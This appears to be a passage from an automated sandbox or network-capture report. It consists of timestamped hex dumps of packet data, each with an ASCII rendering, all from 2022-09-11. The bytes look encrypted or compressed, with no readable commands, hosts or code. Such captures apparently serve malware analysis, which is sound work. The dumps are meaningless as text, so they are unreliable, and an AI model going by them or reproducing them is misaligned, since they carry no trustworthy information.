                                                          2022-09-11 08:16:25 UTC41INData Raw: 24 b9 f3 3d d4 1a 60 eb b9 33 77 bb c1 85 68 70 f4 74 f0 ac 79 64 91 03 7e fa 8f d4 77 6a d1 95 68 54 56 a5 9d 9f 2a e8 a1 0a 46 3b 9d 04 64 2b a7 64 af ea 87 43 ae e3 a8 60 bb fa 2f 6b a8 7c 67 3a 58 80 5a 02 77 26 32 65 30 c1 ec 9c 21 83 4c 05 47 6e 22 69 bd 3e 66 83 85 a9 ae 4a 87 3b 7b 69 51 42 f0 aa e6 fa c5 af 11 3c f7 0f f3 4b 3b 69 9d cd f5 25 8b 49 61 ec b7 3e a2 ad 21 4a 84 22 c7 00 60 2c d5 27 89 e8 4c 53 d3 21 a7 52 e6 94 ae 11 3d f9 6c 65 e6 90 4f fe cd 08 4f 82 1b de cf ea f7 b0 57 95 0d bd b5 d8 06 3b b8 f7 61 7e be 83 46 ab 6c 31 f7 e1 8f 97 91 02 a2 2f e7 ea cf b5 12 17 22 ef cb f9 8a d7
                                                          Data Ascii: $=`3whptyd~wjhTV*F;d+dC`/k|g:XZw&2e0!LGn"i>fJ;{iQB<K;i%Ia>!J"`,'LS!R=leOOW;a~Fl1/"
                                                          2022-09-11 08:16:25 UTC42INData Raw: 37 cf 2a 30 d5 fb 8c 29 1e a9 5b 41 f0 ae 67 4c 9a 02 d3 6f 4a 68 61 47 a6 e7 a5 ec 4f 8c 48 fd 78 c6 c1 08 50 22 02 f8 27 6f 4a fb ce 7d 2b 66 98 c3 a6 76 28 2d 6b 12 a4 28 c6 d2 af bc 65 9f a6 ad 42 49 c7 03 2f 91 50 21 e7 fc b8 a5 66 ad e7 15 cf f8 28 74 34 52 7f 89 35 fb 24 56 64 a7 19 69 df 15 4c 8f 22 ea 4f 72 5d 60 82 df 31 f8 43 18 4d 47 f2 fc 2a 66 52 88 97 ca 2c fc 3b 77 cb 9f a2 0d 13 d8 a6 0a d1 97 ab 61 4b 0b a1 6c c9 01 2e 68 5a 0e 43 9f a0 6a 2c cb 0a de 8c 06 02 d2 3a de fe f8 63 07 fd 82 4b 3c 06 66 21 77 90 80 e6 2b 9e 90 f5 6b 1e aa ff 1c 69 65 27 55 1d a0 e8 51 b9 08 55 99 9f c2 36 e1 6b 0d a3 af 45 d8 10 72 7e 3b 36 5c e5 29 e8 d6 87 9b 4b 14 a2 fc 8e a4 c5 fc 4d 10 37 4d 94 8d 7b ad fa 9c e4 fc 40 6c a4 10 c1 8e fb b4 ff 24 57 c9 8d
                                                          Data Ascii: 7*0)[AgLoJhaGOHxP"'oJ}+fv(-k(eBI/P!f(t4R5$VdiL"Or]`1CMG*fR,;waKl.hZCj,:cK<f!w+kie'UQU6kEr~;6\)KM7M{@l$W
                                                          2022-09-11 08:16:25 UTC43INData Raw: 1d 3f 56 7f 60 d1 da e9 23 9d 61 91 57 92 36 bd 26 98 81 bc a0 9d 64 c3 25 f9 e1 61 db 68 94 82 4d 32 71 65 cb 81 6e 2c a4 ea 62 bf 7a 2e 0a 6f b6 df a2 16 f4 c8 8f 6e f3 e3 d2 03 92 57 92 ff 2f 1a d2 f4 23 bd cb 2e dc 3f 6a a6 57 cb b7 19 4f 3b a4 e1 7e 57 bd fa 00 cf 02 58 6a a7 ea b2 00 60 aa 01 cb 84 49 60 ea e4 ad 64 2e 21 a8 2b 61 a4 2f 66 0a c7 ad e7 29 45 4d 70 b8 82 40 ce 0a ad 44 80 67 8f 4f 46 82 cb 89 30 1e c2 94 8e dc 86 0b e7 60 dd 7a 2e 64 34 1e c5 97 8e 35 ea 29 38 92 47 e7 9d c1 1b ca 87 4f 9c 52 e0 21 4d 8a 07 45 e9 a2 6d 9e 78 c2 65 18 f6 ea 82 e5 e2 ce c5 c6 8d 6c e8 eb f1 5b 83 a8 26 38 71 a8 26 2b 61 ec 18 bd 96 b0 a4 4a ca d7 dc 2e 80 c2 67 e3 8f d7 7f 57 5c f4 fa 0a ff 9e 65 39 53 c6 63 ee 28 e3 a2 ed 18 52 f0 c5 4d 8b 13 2a a3 7e
                                                          Data Ascii: ?V`#aW6&d%ahM2qen,bz.onW/#.?jWO;~WXj`I`d.!+a/f)EMp@DgOF0`z.d45)8GOR!MEmxel[&8q&+aJ.gW\e9Sc(RM*~
                                                          2022-09-11 08:16:25 UTC44INData Raw: dd 9a 2c 24 6c ea 06 39 dc e9 7f 3d 2a b6 d2 5a 3c 27 4a 83 d7 fc 8c e6 26 63 dd 1a ad 4a 5d 7a 9c 92 f7 80 be d3 94 83 75 5c 8b b3 55 dc 31 bb 70 e0 2e 54 14 a6 f2 51 8c 9b 97 55 5b e3 ea 7d 9e 80 1f e2 97 b8 74 af 52 90 55 51 71 b3 eb e1 e4 a4 f2 41 8c b2 60 26 25 9b 95 e1 6b cb f3 8a 1f 76 ad 44 fc 11 4f 92 97 fb a3 3b bb 8a eb d7 33 eb 2d fc 15 99 76 15 2d 0b 38 36 98 1e 5b 0d b4 b9 25 5f 84 39 96 e9 9c 86 d6 7f 07 ca f0 b7 79 33 20 ea 44 88 5d 29 15 69 d5 0d 3b a4 0a 81 06 0f b0 a2 3c 2d 6f 52 91 38 e7 76 72 43 5a 8f 84 e1 e5 f0 22 7c 8c 7a 35 d4 ff 2d 5c d2 b2 30 23 a2 62 f1 e8 3f b0 5c d1 30 8c 56 f9 21 22 e3 1d 54 ae a0 e0 e7 1d b0 f5 11 62 6f 58 e0 36 71 2d ff af b3 35 c9 a5 d9 47 d3 ef 1f 02 7b 04 fa f1 6f f6 30 a1 37 cd 96 eb a4 f6 7e 2c e1 2e
                                                          Data Ascii: ,$l9=*Z<'J&cJ]zu\U1p.TQU[}tRUQqA`&%kvDO;3-v-86[%_9y3 D])i;<-oR8vrCZ"|z5-\0#b?\0V!"TboX6q-5G{o07~,.
                                                          2022-09-11 08:16:25 UTC46INData Raw: 69 25 59 5d 67 f0 fd aa 21 34 08 17 86 11 1c 0e 28 6a fa b5 ba 34 6d 4a 8f a6 a7 64 5e 75 43 91 17 a4 a2 26 e9 60 66 ae 02 c2 df 07 f2 8a ce a6 3e 9d 4e 6f 25 7d 11 cf db d4 dc 50 5f b4 80 93 65 91 25 ef 65 96 65 1b 7b df 11 b1 0a 07 36 5e 0a d1 58 50 40 3f 3e 3f 16 76 75 d0 25 e3 79 e3 7b e1 e6 2b 59 ff 6c 8f e0 e3 e2 df d4 10 5a 1d da dd 15 e5 69 a0 18 aa d8 e5 ae ef e2 a8 ab e9 61 c3 03 61 67 23 4e 87 10 9b 3f 7d 2a 52 5d 3c 31 94 d9 6c 28 63 5a fb ce 26 61 e0 8a c2 a3 6e 2a e3 9d 6f 5e a7 2f 70 1b cb 25 3b a3 d5 5b 3e c8 ce f4 93 c7 5d 0a be 2c 66 ef ae f4 6b 61 a9 1c 88 7c 3b 5c 6c d6 e6 54 3d 00 2e f1 a8 1e 50 b7 ad f5 cb 12 aa 62 63 12 6d 2d f3 0b 7e 0f d6 18 e0 22 72 bd 63 58 3b e6 1b c0 3d 1a 87 f7 85 11 6e fa fb 33 6f d8 0b 28 fa 03 59 30 7b 21
                                                          Data Ascii: i%Y]g!4(j4mJd^uC&`f>No%}P_e%ee{6^XP@?>?vu%y{+YlZiaag#N?}*R]<1l(cZ&an*o^/p%;[>],fka|;\lT=.Pbcm-~"rcX;=n3o(Y0{!
                                                          2022-09-11 08:16:25 UTC47INData Raw: ca c2 2d f6 4d 35 88 61 28 c2 aa 86 9a 53 f8 36 ab ef 07 40 5c 95 8a 40 fd 36 82 c1 46 d7 97 ca 95 1b 6a f1 d5 6f 83 6c 58 1a 23 e6 0b 93 b9 a7 97 d0 81 c4 7e 9d 59 44 20 73 0d d1 40 2e f7 e6 e0 4c c5 b6 b3 9d 82 bb 28 fe 76 65 c9 59 3f fe 39 a7 e7 f8 b8 f7 b7 af 1b 72 0b e6 3b a4 c6 ed 4e 32 91 4d 4d 15 3a 5f c9 19 be 19 85 09 f1 0f 66 06 e9 c2 03 b7 f1 32 73 af e7 16 d3 fa 12 05 6f ab 84 44 4f 80 2d b4 e9 51 4b 97 08 d9 12 f4 69 2a f5 bb 80 76 3b 3c 20 23 5f 5c 80 03 ee 26 de 71 55 bd 9a 29 b7 1d ac 49 41 62 a5 52 48 b9 41 f4 2d 3f e3 94 0d 1f f9 7d cc a0 42 1d f7 8b 4d f5 6c a0 d5 48 83 81 72 5a b5 57 08 ef f7 a3 ce 82 74 bb 5a 52 f5 e1 67 80 3f c3 67 b7 46 72 aa 93 0f 93 0f ca 9f 19 c8 23 7b 32 08 43 9a 52 b0 79 fc c5 50 ab 24 0d 4e 61 37 be e6 a9 51
                                                          Data Ascii: -M5a(S6@\@6FjolX#~YD s@.L(veY?9r;N2MM:_f2soDO-QKi*v;< #_\&qU)IAbRHA-?}BMlHrZWtZRg?gFr#{2CRyP$Na7Q
                                                          2022-09-11 08:16:25 UTC48INData Raw: e8 6f 64 a2 4f 81 dd 9b d0 1c 11 d5 8b 46 a7 b9 93 66 4e 5b 6b ff c5 66 cb 02 e7 96 96 db 26 fe 8b ef 4f 55 31 f9 d5 0b e2 7e 3c e1 57 17 65 da 09 fd 67 1a d5 e5 a7 e0 a8 9b 29 7b 4a a9 e9 6b f7 d3 0f eb 67 6b 2c e1 ec 25 20 2d 6b 08 f2 02 f0 3c 19 b3 6b 69 a6 fd cf ee a3 ea 67 32 69 c3 4d 63 7b a7 e5 e5 e4 28 a2 e9 63 2a a3 41 43 60 62 26 26 d7 12 7b c2 5e 72 02 2e 20 64 b5 f1 38 7c e3 f1 cb bc 0f 2e 0c f3 d1 4d c7 1f d3 95 bf a1 22 32 34 08 52 e8 d1 94 a1 87 0a 2c a1 f3 f7 6b d3 1b 7a b7 a3 6b d7 b7 35 2b 11 f8 85 57 e9 e0 aa 26 19 25 34 72 91 d6 e3 db ce 45 aa d6 4e a5 13 67 2b ce aa a1 23 6b cc 7d e0 d2 92 09 d4 d7 0e a5 6b 0e c0 b3 c3 26 a1 ec 21 6c 8e 43 02 89 c9 43 40 4c 86 43 e9 ed 26 67 db 08 89 40 6c 7d 69 ae cf c2 3c d4 0f 7c b0 da eb d0 39 fa
                                                          Data Ascii: odOFfN[kf&OU1~<Weg){Jkgk,% -k<kig2iMc{(c*AC`b&&{^r. d8|.M"24R,kzk5+W&%4rENg+#k}k&!lCC@LC&g@l}i<|9
                                                          2022-09-11 08:16:25 UTC52INData Raw: 1b ba 6c a7 18 a7 06 0f 33 5f cf c0 40 67 70 75 89 7c 52 fe b6 bf 9e d4 f3 e3 4d 05 87 e0 65 7b 5f a0 6f 4b 99 9e 4e ad e5 03 4d 2c da 63 e5 d3 e5 34 8d 1c f8 26 59 d0 af fa 5c bb ff c0 f9 64 91 a0 43 8e 20 73 32 bd 48 e9 84 3a 75 85 2a a6 0b 87 e0 b1 d6 d6 39 a4 92 0c c6 8e bf 5c 1f af 12 6b 52 fe 99 04 38 ff c3 04 18 de c2 04 8b 4c 65 a0 6a 2e 53 26 5a 5b 16 e4 94 69 99 63 26 91 c6 83 8f 70 ac 62 fd 78 22 28 6c 9b db 9c 90 15 09 dd 94 71 79 46 e3 9e 9a 67 d3 ab 8e c4 6c 28 5c 18 77 8f a2 8e 31 2e ec 60 ef 7e 73 f7 c5 6f d6 be f9 84 4b 96 5d f2 d2 81 26 38 7b 54 9c 8e 48 2e 6c 0b 71 1e 28 64 e5 ce b2 da bf 11 38 d3 f9 33 4f 80 6f a7 9e 90 fd 1f 13 f6 a9 c7 08 c6 7a a7 0b bf a3 65 54 dc de 63 de e3 af 5a 33 31 93 6d 98 7b b8 68 ed 13 3c 40 db 83 1c f7 da
                                                          Data Ascii: l3_@gpu|RMe{_oKNM,c4&Y\dC s2H:u*9\kR8Lej.S&Z[ic&pbx"(lqyFgl(\w1.`~soK]&8{TH.lq(d83OozeTcZ31m{h<@
                                                          2022-09-11 08:16:25 UTC57INData Raw: c7 62 b7 7b fe 70 be 37 8d d6 33 6e a7 6c 8d 02 ca 45 8d de 39 64 83 6b 8c 40 2b c2 8a 47 83 50 b7 7a 19 c8 a5 74 4e 04 17 49 d7 df e4 ca ef 06 ca 00 a0 ba 77 6a 94 99 67 66 c3 02 ab 66 ac 75 b3 0c c1 c3 56 32 ac 31 9d 02 a5 95 4d 2f b6 2f b3 f1 f4 b2 2e bf df 6a 00 12 a3 e0 92 2d 93 af b8 21 06 69 ed 20 a7 fa 36 6b cd 40 20 e9 c7 0c d5 5b 6d 5e 4d 53 c8 29 81 bc 5b d9 19 6b 98 55 7f 9a 06 97 f7 4e b7 2a a4 ff 67 ec ae 9f fb 6e 97 81 4d 1f c7 48 00 2f ef ed 2c ba f3 77 31 d4 d2 aa 32 7f 58 e1 f7 7e fd 00 cf 12 16 4b 4a f8 4d 93 09 a9 17 d0 2c 4c 94 ff 14 79 86 7f bb 62 b3 fd dc 96 ab 6d 2c 11 d8 a9 67 11 57 6d ac ea d5 9c a3 3f 7b 73 17 c2 2a eb 24 e2 e7 49 13 ce a0 6a 20 91 e0 aa 23 70 bc 87 4b e1 ad ec ad cd 01 64 84 9b 77 e0 09 ce 24 b9 1f 2a 49 3c b7
                                                          Data Ascii: b{p73nlE9dk@+GPztNIwjgffuV21M//.j-!i 6k@ [m^MS)[kUN*gnMH/,w12X~KJM,Lybm,gWm?{s*$Ij #pKdw$*I<
                                                          2022-09-11 08:16:25 UTC61INData Raw: e4 c8 b0 b6 fb dc ed 78 98 80 a1 89 1e 51 fb 1f d6 22 1a 57 59 94 bb 68 f3 5b a4 c0 ab 20 57 22 36 96 b1 2e 61 ed 4c c3 14 34 62 86 2e d2 74 f6 f0 b7 b1 d5 6c 4d 3b c3 8b ed a1 17 fc 42 55 6e bd 85 e8 f9 26 c3 38 39 8e 3b bb d0 85 aa ac 90 9e 22 28 6c e3 95 be 30 10 64 25 86 08 65 49 f4 94 2e 6e a5 68 b5 79 68 4d 38 e1 a4 6a d3 9c c2 7a 9c 8b 97 70 ff e8 c0 83 88 69 de be fe 10 cf 85 a2 24 62 6d e5 6e da 86 04 18 e1 a9 a4 12 7a 33 39 03 69 23 0b ac 91 26 b4 d2 18 43 c7 3f 96 4d 28 f5 f5 7a b5 20 e9 1c 96 1e 3e 85 ac 94 d0 15 98 ea 95 20 ad 99 4b cb bf 9e c0 1c df 57 e3 1b 2c 12 14 a1 ee 83 7c 95 1f e3 89 f1 e5 27 6b b9 ca cf e4 92 22 17 fe 02 96 ab 86 db 65 05 63 84 6e 9d 9f eb b6 54 c9 6a 58 e0 da e9 ee 23 dd 99 f5 8b 16 e3 6b f3 84 80 de 03 33 8c 28 92
                                                          Data Ascii: xQ"WYh[ W"6.aL4b.tlM;BUn&89;"(l0d%eI.nhyhM8jzpi$bmnz39i#&C?M(z > KW,|'k"ecnTjX#k3(
                                                          2022-09-11 08:16:25 UTC64INData Raw: b4 63 5d 8a 42 f2 3a 63 a7 94 5e d9 c3 b2 4a 86 c7 2e 52 b7 b3 79 d4 23 1e e8 f5 c5 8f 30 af 53 74 86 22 1d d4 98 57 0e c7 9e 37 11 dc 07 42 6c 8f ee a2 2d aa 66 a7 94 8a b6 c2 05 d2 1a ad 08 ca 9a 53 9c a3 93 bc 0e 80 51 41 a4 35 be e3 2e c3 38 d6 43 8b 32 ba cb 28 2f cd e7 af 9c d7 7c 93 5a 33 2f 77 73 6a be c2 36 03 72 a3 fa 82 c3 a7 06 4f 8b 27 92 07 b1 5a 4f 72 8e e0 23 be eb 13 66 9f 6d 4b 20 03 3a f4 87 4d 3b b1 2d bd e0 c7 44 4c 49 44 aa d8 a7 49 40 14 a8 b7 ad 4a 67 e1 b7 59 17 8f 14 3e ea f4 5c 8a e5 30 ba 27 3d e7 3a a7 ac 61 6d a0 e9 5a 00 a3 09 c1 7f 2c a7 f1 f9 e4 ab d2 09 f0 7a a1 6b 18 fd 82 b2 0b af cc e0 26 e7 28 e4 67 ab d0 19 a4 8b 46 e2 69 3d 3c a7 f5 f7 1e 1d f4 b9 26 3e b1 1f d5 ae 26 6d b4 3c d1 15 21 e7 67 6c 61 ab 60 35 a6 69 38
                                                          Data Ascii: c]B:c^J.Ry#0St"W7Bl-fSQA5.8C2(/|Z3/wsj6rO'ZOr#fmK :M;-DLIDI@JgY>\0'=:amZ,zk&(gFi=<&>&m<!gla`5i8
                                                          2022-09-11 08:16:25 UTC68INData Raw: 26 f7 9e 8a 9f fc a9 23 92 1e 34 09 0e 36 ab eb 67 2c a4 12 11 79 cb 0c 6b eb 23 fd 0e 63 83 6d a6 9d 14 26 e5 ae 4f 0e ef 6a d6 e7 37 47 e3 26 a2 10 80 22 bb e2 7e 3c 69 1a 3f 84 a9 25 90 37 b6 13 63 0e 9d 0f 43 19 ce ea e8 07 48 3f 23 08 43 fa 29 6d 76 30 e0 b8 b6 67 1e dd e1 eb d7 d9 33 0b 85 67 ea 08 80 b3 4e dd 6b ca 01 3f 99 46 ba 97 df b7 e5 3e 7c 14 95 7c 5e 11 7f 10 4a a3 f2 ac 3b e1 29 ef 76 d2 74 5b 2b 0e 2d f5 11 b6 fc 84 c9 b1 f6 2d c1 08 78 99 43 5b 9d 69 27 26 e3 e2 c7 c4 a4 ee 0c cd e3 2e 2f 0e 0b 6f df 3f 02 e7 4e c3 6a a7 2d 6d a2 a2 65 20 e8 e9 cb c3 e1 19 5c 2f 58 2c 5a 2e 0c 4b e0 2f a6 69 e0 e7 ed 69 28 99 1f cd 00 42 42 69 e1 2f 21 a7 a9 f2 e9 72 e0 b8 fc 2e 30 b6 20 66 ec fa ba 25 3f 75 26 23 f0 e7 6b 71 51 17 ea fc 88 95 3d 4f ef
                                                          2022-09-11 08:16:25 UTC183INData Raw: e8 25 62 65 22 e2 45 22 1f aa 93 5e 93 84 69 a7 c1 14 5e 4c e9 cd 59 7a b3 6f 37 e1 8c 46 43 4b 4d 77 d0 d1 44 87 7d 47 a7 a9 23 4c 5f b3 25 83 8c e1 34 0c 78 e8 5a ac d1 66 06 9c 95 2b 4b 63 c6 2b 93 16 4b 90 dd 42 fb 7a 7b b3 9c 34 e4 8a bd 7a 4b de 33 66 2a eb 49 86 a4 6f 78 75 c7 84 ed 90 18 5e f3 a5 4b 96 38 0b 2b 0a 49 68 46 89 d5 11 76 9c aa 7a 90 49 03 57 db 90 9c 15 6c db a3 61 cf c1 1c 13 77 9c be 9e 66 b8 5f 4b ed e3 1a 16 72 b2 e4 dc 57 b4 47 9d de f0 9c 40 5b b2 48 a5 39 ee 5e 57 57 eb 0f b2 9e 43 d6 d5 40 4e 87 3f f6 70 ef 51 53 af c4 88 c7 31 8c f9 ee df be fc 10 2b 78 df 5b de 85 af cd 72 7b 73 d5 de 32 7d 54 75 7e 0f 87 2f 11 d9 2c a3 65 ee 86 4f a7 9a 28 28 db 2b 87 3e d0 b4 78 ab 74 7b 25 05 49 62 6d da 28 ea 51 a7 c7 48 a0 8b 47 e1 26
                                                          Data Ascii: %be"E"^i^LYzo7FCKMwD}G#L_%4xZf+Kc+KBz{4zK3f*Ioxu^K8+IhFvzIWlawf_KrWG@[H9^WWC@N?pQS1+x[r{s2}Tu~/,eO((+>xt{%Ibm(QHG&
                                                          2022-09-11 08:16:25 UTC187INData Raw: 22 d3 0f 8d 10 a5 3c 3f ed 79 fe 68 ef 53 13 8d 44 5b 54 a5 ab 78 4f 83 0e 9e b0 90 32 66 96 16 d5 68 51 b0 0e fa 85 99 e6 d2 ce 18 c0 1f aa 5b 11 db bc 5a e1 35 ba 1f ee 22 88 48 39 73 72 a9 a7 00 57 0c 8f c2 08 00 fa 32 cb 66 07 da ed 2c dd 00 b3 13 cc fb ef 39 2d 60 32 7f 2d b6 10 1b a4 b8 9d c6 50 da ac b1 d2 4f 05 44 7b b8 ad b3 9f 52 3c fb 0e 05 73 d3 ca 84 df 90 cb 63 e4 2d b5 38 eb 00 cc 7b db 07 b5 15 ca 7f ff 4c d8 2d c2 c1 26 70 1c d4 8a 73 56 21 37 62 3f fa ab 42 9d ff e6 30 bc 32 ff 38 ee f9 62 f2 5f d2 b8 f9 3f 31 7b ab cf 46 84 89 6f e9 c5 84 ab a8 7d b8 65 d1 d6 f2 17 19 1d 38 83 3d a1 38 f3 25 6d be f6 6a a5 3a e8 89 6d df 3f 72 26 eb ad 70 3e 8f ef 5e 3a d7 97 fe 18 a1 40 70 46 b7 3e 36 13 9a 1b 4e 60 e0 2a 32 90 c9 8a 33 b0 b0 6f 2e c2
                                                          Data Ascii: "<?yhSD[TxO2fhQ[Z5"H9srW2f,9-`2-POD{R<sc-8{L-&psV!7b?B028b_?1{Fo}e8=8%mj:m?r&p>^:@pF>6N`*23o.
                                                          2022-09-11 08:16:25 UTC189INData Raw: a5 3a 87 8b ec a0 6f 63 a2 ba f2 67 21 ac fa fa a1 ec 4f cb 23 59 a6 c3 a6 c2 18 fa 28 6b 72 3c 27 f7 63 3b d2 c1 c7 00 df 93 27 d3 eb 1a e6 97 1c 68 db 47 1e a5 c0 22 f2 37 fe 68 35 61 69 66 cd 08 af 02 1f a0 b8 7f 5f 5a 38 2e 26 ae e1 39 8f 90 1e 31 b7 74 ca 8a 32 6c 57 91 cf 79 d1 1f ca 86 5e 06 93 4f 31 e0 ea 4a c1 78 a5 49 87 69 ac 63 a5 4a 84 6b a6 1e 80 b3 64 3e 3e 26 6e 1e 98 aa 7d 3f 26 3d 01 5e c0 ce 41 f3 5b 38 75 cd 68 aa 06 eb af ea 59 e8 7b 68 7a 7e 4c 44 ba 99 5f 17 ee 69 3d ff 67 69 ef 84 2a 6a cf 1c 51 94 a6 63 50 7b c3 06 34 f1 f7 32 34 e9 cf 0d af ee 2d 6b f6 b0 5c 12 24 2f 81 cb 8f eb 48 9a 8e 54 d8 3d 67 8b 64 1e f0 8b 6d cb dd 73 96 f0 1a 6b 68 9d 66 d4 e6 d3 b0 dd 00 ef 61 7e b7 e9 45 0f 23 65 ab 88 ce 42 87 ad 21 2f 63 4a 45 af 61
                                                          Data Ascii: :ocg!O#Y(kr<'c;'hG"7h5aif_Z8.&91t2lWy^O1JxIicJkd>>&n}?&=^A[8uhY{hz~LD_i=gi*jQcP{424-k\$/HT=gdmskhfa~E#eB!/cJEa
                                                          2022-09-11 08:16:25 UTC193INData Raw: de bf 1a 63 93 5a 51 ba 71 9c 91 5a 7d e5 c2 5a 6b 96 97 d2 2f 5a 0d f0 97 fc 64 0f 97 e8 15 5a d5 28 97 0c f1 5a f1 69 c2 5a ed 10 97 56 ab 5a 97 6a 97 52 c9 1f 34 c5 c8 1a b1 4c 97 6a 97 5a 41 dc d2 4a a2 ba 47 5a 65 98 97 de 46 0f 97 c2 3f 5a 31 cc 97 e8 15 5a d1 49 c2 5a cd 30 97 30 cd 5a ef 12 97 5a 02 cf 97 4e b3 5a b7 4a 97 90 79 be 45 2d c2 5a 7d 80 97 a4 59 5a 19 e4 97 c2 5a 0f 97 f2 0f 5a 2b d6 97 ea 17 5a d7 4f c2 5a cf 32 97 26 db 5a 93 6e 97 76 ee 0f 97 6e 93 5a 53 ae 9f 80 75 5a 75 ed c2 5a 0d f0 97 f0 0d 5a 2b d6 97 10 88 0f 97 04 f9 5a f9 04 97 24 d9 5a 47 21 7c 03 8f 75 93 c0 39 6a b9 5a ad 50 97 cb f7 9b a1 6c a7 ea 56 1b d7 ea 57 e8 ad d6 92 77 8e 5a a2 90 ad a1 9a 66 dd 1a 16 da e2 10 9c 6f 9d 11 d6 5a 4d b6 94 6f 7d 80 97 a2 ec d9 97
                                                          Data Ascii: cZQqZ}Zk/ZdZ(ZiZVZjR4LjZAJGZeF?Z1ZIZ00ZZNZJyE-Z}YZZZ+ZOZ2&ZnvnZSuZuZZ+Z$ZG!|u9jZPlVWwZfoZMo}
                                                          2022-09-11 08:16:25 UTC194INData Raw: 0b 89 ee 74 4b 98 d9 10 a3 7c e4 3f a1 6c b2 7f b7 72 ad 69 b5 7e 0a eb 8c 61 d9 1f a4 5c 92 75 72 a0 98 ff 00 67 ac 04 c2 69 81 4f a8 cf 0d 6d 0a c5 a2 69 21 ef a4 2c e2 65 42 80 98 7f 85 62 ac 3c fa 69 b9 77 a8 ff 3d c2 1b 79 f3 39 ac 1c da 69 99 57 a8 cf d7 b0 68 b2 b0 61 c1 07 a4 44 8a 65 fe 86 1d 6d a1 24 65 e7 a0 20 ea 65 52 3d 0a 55 9b 69 ac 60 95 4a 34 95 1b 29 78 9f 2e c9 20 1e 54 eb 95 d9 28 a3 e1 d5 02 fb 2c ef c1 89 26 eb 2c 68 08 4c 24 3c 73 fc 33 69 24 2a 64 e5 4e 0c 38 72 75 3f 22 34 7c eb bd f1 20 fb b1 d5 18 e1 e0 2e d4 91 20 ed a4 e0 78 3c 18 46 79 27 22 04 4c eb 26 81 c5 d5 91 e9 25 cc ea 8b ac e9 ef a1 30 8b d1 f5 39 8c 97 ac b6 ed b7 7d e7 2a c2 1c b3 ed 1c 05 fb 15 50 ed 97 dd 28 ab e9 d5 97 b0 f2 ef c5 8d 26 4c 00 ed 0e 44 24 e8 11
                                                          Data Ascii: tK|?lri~a\urgiOmi!,eBb<iw=y9iWhaDem$e eR=Ui`J4)x. T(,&,hL$<s3i$*dN8ru?"4| . x<Fy'"L&%09}*P(&LD$
                                                          2022-09-11 08:16:25 UTC198INData Raw: 15 00 03 14 20 5d ab d7 6c f4 35 ba 4c a9 9d 79 14 4e 65 3d 21 13 cd fe a5 80 94 b4 97 dd 3c 77 cf 3a c4 33 fa 67 6c f0 c6 1d 77 a7 fa 40 df 64 a2 a7 27 20 97 fa 8f e3 13 69 d6 a9 21 34 7e 6a 79 d3 86 2e 4c 8e 2e ed e0 81 bb f5 f8 dc 13 36 a0 3b eb 72 95 66 43 b1 11 f5 1a fb 23 a8 b2 38 7b 4f 4a 7c 4e 12 e2 bf 72 68 f9 e8 4e 35 51 2b 16 d2 a9 6f 23 8f 01 ac a7 1c 58 e6 95 41 f0 25 cd a6 08 61 f8 fb a0 a2 b4 52 3e cf 94 0f 96 0c cc e8 6e 48 f9 b5 c6 8b 7d 26 9f c1 4f 7b 37 02 17 9c cf 46 22 c1 67 85 1e bb 7c d2 22 e6 d4 11 7a 01 2c 55 4f 5c 84 96 cb cf dd dc f9 92 75 1f a1 75 8d 5b 94 28 25 98 78 f1 89 be f1 ac 21 7d a9 4b d9 39 9c 16 71 fa 18 85 28 b0 2a d8 80 73 72 3f 78 37 47 62 d0 f4 7b 18 cb a3 47 45 63 60 1f a2 9b 24 2a ff 33 e7 ae 6c 6a ad 9c 31 c2
                                                          Data Ascii: ]l5LyNe=!<w:3glw@d' i!4~jy.L.6;rfC#8{OJ|NrhN5Q+o#XA%aR>nH}&O{7F"g|"z,UO\uu[(%x!}K9q(*sr?x7Gb{GEc`$*3lj1
                                                          2022-09-11 08:16:25 UTC200INData Raw: 01 ce 17 ca 76 cc cc ce 77 4d 23 84 8f 4f f8 80 d9 0e e2 27 ae 0c 39 23 e1 13 99 c3 2c 11 42 c7 7a 50 58 60 0d 52 83 64 0c d3 6c 2e f4 d1 b7 2a a2 90 ad 8d d5 92 76 89 3b d4 05 b2 06 d6 de b6 50 97 c4 11 27 95 1f 15 26 14 f0 5f de 16 2b 5b 88 57 31 fc ff 55 ea f8 8e db d7 8a e3 d9 0c 8e b5 98 16 29 c2 9a cd 2d c3 1b 22 67 3b 19 f9 63 6d 58 e3 c4 1a 5a 38 c0 f4 1c 4b fb c9 1e 90 ff 9f 5f 8a 58 e8 5d 51 5c e9 dc be 16 11 de 65 12 47 9f 7f b5 30 9d a4 b1 79 6a a7 6a d0 1a 90 cc df 8a c8 27 12 fa ff 81 1a 00 0e b7 ce 70 39 11 c1 e0 61 fa 0c 90 56 5c 0a bf f4 d0 ec cf c3 76 e3 5f 9b 9d 2e 2f ac 3b 26 d5 5d 0d f2 a5 6a ab fd 35 32 40 30 45 05 e6 2b c0 00 1e a9 b0 37 b8 a6 20 6f 53 6b 50 58 f5 63 aa a9 c3 b7 da 9e 65 b8 4a c6 8e 75 3a f1 28 73 15 53 a4 95 65 64
                                                          Data Ascii: vwM#O'9#,BzPX`Rdl.*v;P'&_+[W1U)-"g;cmXZ8K_X]Q\eG0yjj'p9aV\v_./;&]j52@0E+7 oSkPXceJu:(sSed
                                                          2022-09-11 08:16:25 UTC204INData Raw: e0 00 57 2a aa ef d6 9a 16 63 f9 19 91 c4 e3 58 dc 71 0d f5 97 37 36 86 d1 22 5c ff 90 1e 63 58 8a 5f 64 3b 91 9c 90 00 db 73 11 75 d3 12 65 de bb b5 7f 9f 33 b4 7c 69 50 eb a4 1d b3 f8 a5 da 97 e2 f7 b6 b3 f6 5b 1a 0d 58 0f 5a 0f f2 97 de 23 5a 6f 92 97 6c 79 82 97 db 17 05 ac 6a a6 2e 87 0e aa 60 b0 77 a1 6b a8 0b d5 61 de 19 a0 6c b0 6e c6 07 ea 2f ac 60 c3 6a c1 0c ce 6f ae 2f e2 7d a7 77 cf bd f3 9b d3 b8 74 6a a7 0e a2 7f d1 09 73 de cf 6d ba 6c b4 6a c1 03 ad 60 ab 61 bd 3e ea 2f ea 62 a5 75 d3 0c d5 7b c3 7d d4 7e b0 68 a7 03 a0 67 ab 68 ea 3a b6 7f ba 61 f5 5f d4 79 ce 14 a6 e9 51 5d dc 00 ee 6d af 0c cb 67 b2 7b e2 7b b8 76 95 44 b8 6a b6 09 8b 75 ae 13 d5 71 a9 65 bb 3e b6 62 9e 53 ab 72 b8 68 a6 6c b0 4a ea 46 b4 73 ec 0b 82 62 ca 9b 53 6e a4
                                                          Data Ascii: W*cXq76"\cX_d;sue3|iP[XZ#Zolyj.`wkaln/`jo/}wtjsmlj`a>/bu{}~hgh:a_yQ]mg{{vDjuqe>bSrhlJFsbSn
